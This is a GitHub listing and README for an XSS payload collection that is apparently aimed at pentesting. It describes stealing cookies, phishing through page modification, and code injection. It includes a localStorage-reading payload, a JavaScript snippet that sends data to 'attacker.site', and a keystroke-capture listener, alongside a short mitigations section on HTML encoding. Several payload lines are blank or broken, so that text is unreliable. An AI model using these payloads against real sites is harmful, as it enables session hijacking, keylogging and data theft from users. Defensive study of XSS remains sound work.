https://github.com/p1ngul1n0/xss4fun
XSS payloads just for fun.
- Host: GitHub
- URL: https://github.com/p1ngul1n0/xss4fun
- Owner: p1ngul1n0
- Created: 2020-03-12T17:47:47.000Z (over 6 years ago)
- Default Branch: master
- Last Pushed: 2021-04-25T01:29:42.000Z (about 5 years ago)
- Last Synced: 2025-10-24T15:57:08.895Z (8 months ago)
- Topics: cross-site-scripting, pentest, pentesting, web, xss
- Language: Python
- Size: 33.2 KB
- Stars: 6
- Watchers: 0
- Forks: 2
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# XSS4FUN :cookie:
Cross-Site-Scripting just for fun.
## Cross-Site-Scripting Utils:
- Steal cookies for session hijacking.
- Modify Webpage to perform phishing.
- Inject malicious code.
## Basic payloads:
- alert(1)
## Useful payloads:
- ** **
- To include malicious JavaScript code in the page.
- **\
**
- When the **** is filtered by the web application, JavaScript events can be used instead.
- **<script>alert(localStorage.getItem('salary'))**
- To collect sensitive information stored in Browser Local Storage.
- **
**
- This payload starts a loop, so the browser keeps sending requests carrying the cookie to the attacker's server.
## Useful JavaScript snippets:
- To perform an HTTP GET request
```
var xhttp = new XMLHttpRequest(); // Init xhttp object
// `data` holds the value to send and must be defined before this runs
xhttp.open("GET", "https://attacker.site/strokes.php?data=" + data, true); // Asynchronous GET request
xhttp.send(); // Send request
```
- Collect pressed keys
```
var pressed_key; // Last key pressed
document.addEventListener("keydown", function (e) {
  pressed_key = e.key;
});
```
## Mitigations
## PHP
Using **htmlspecialchars** to convert special characters to HTML entities.
```
// ENT_QUOTES also encodes single quotes, which matters when the value is placed inside an attribute
$word = htmlspecialchars($_GET['word'], ENT_QUOTES, 'UTF-8');
```
## ASP NET
Using **HtmlEncode** to convert special characters to HTML entities.
```
user_input = System.Web.HttpUtility.HtmlEncode(user_input);
```
So this **alert(1)** is rendered as the literal text **\<script\>alert(1)\</script>** instead of being executed.
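The encoding step above, as an added example that is not part of the xss4fun repository: a JavaScript equivalent of `htmlspecialchars`/`HtmlEncode`, the unencoded and encoded rendering of a search term side by side, and a check that encoded input never adds tags to the page. The function names and the sample template are my own assumptions.

```javascript
// Added example (not from the xss4fun repo): the output-encoding mitigation the
// README describes, written in plain JavaScript so it runs under node.
// Encodes the five characters that matter in HTML text and attribute contexts,
// including the single quote that PHP only encodes with ENT_QUOTES.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

function htmlEncode(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable rendering: the user's search term concatenated straight into HTML,
// the kind of input field xss4fun.py probes.
function renderUnsafe(word) {
  return `<p>You searched for: ${word}</p>`;
}

// Hardened rendering: same template, input encoded first, the equivalent of
// $word = htmlspecialchars($_GET['word']) in the README.
function renderSafe(word) {
  return `<p>You searched for: ${htmlEncode(word)}</p>`;
}

// Property check: rendering the input must not change the number of tags on
// the page. Counts '<' followed by a tag-start character, with and without input.
function inputIntroducesMarkup(template, word) {
  const countTags = (html) => (html.match(/<[a-z\/!]/gi) || []).length;
  return countTags(template(word)) !== countTags(template(""));
}

// Constructed sample: the README's basic payload.
const SAMPLE_PAYLOAD = "<script>alert(1)</script>";
console.log(htmlEncode(SAMPLE_PAYLOAD));                          // &lt;script&gt;alert(1)&lt;/script&gt;
console.log(inputIntroducesMarkup(renderUnsafe, SAMPLE_PAYLOAD)); // true
console.log(inputIntroducesMarkup(renderSafe, SAMPLE_PAYLOAD));   // false
```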
## Automated Detection
## xss4fun.py
Uses Selenium to find input fields and inject payloads; if an injection is successful, a screenshot is taken.
## References
- ASP.NET Server.HTMLEncode: https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525347%28v%3dvs.90%29
- PHP htmlspecialchars: https://www.php.net/manual/en/function.htmlspecialchars.php